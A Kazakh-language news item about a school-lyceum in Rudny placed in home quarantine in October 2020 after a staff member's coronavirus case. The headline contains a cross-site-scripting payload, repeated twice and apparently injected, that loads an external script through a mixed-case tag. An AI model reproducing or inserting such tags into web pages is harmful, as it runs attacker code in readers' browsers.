Рудный қаласында мектеп-лицей карантинге жабылды<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

19.10.2020

2020 жылғы 17 қазан 00:01

      Рудный қаласы №4 мектеп-лицейінің оқушылары мен педагогтер құрамы үй карантиніне алынды, деп хабарлайды ҚазАқпарат. Ақпаратты Облыстық тауарлар мен қызметтердің сапасы мен қауіпсіздігін бақылау департаментінің баспасөз қызметі растады. Білім беру мекемесінің бір қызметкерінен коронавирус анықталған. Осыған байланысты оқушылар мен мұғалімдер 16-23 қазан аралығында үй карантиніне жіберілді. «Қазіргі уақытта оқушылар мен педагогтер арасында ауру дерегі тіркелген жоқ. Аурудың алдын алу мақсатында балалар мен қызметкерлер үй карантиніне жіберілді», - делінген ведомство хабарламасында.

Ссылка: https://www.inform.kz/kz/rudnyy-kalasynda-mektep-licey-karantinge-zhabyldy_a3707405

Просмотров: 508


Пікір қосу



Деректерді қолтаңбаға қосу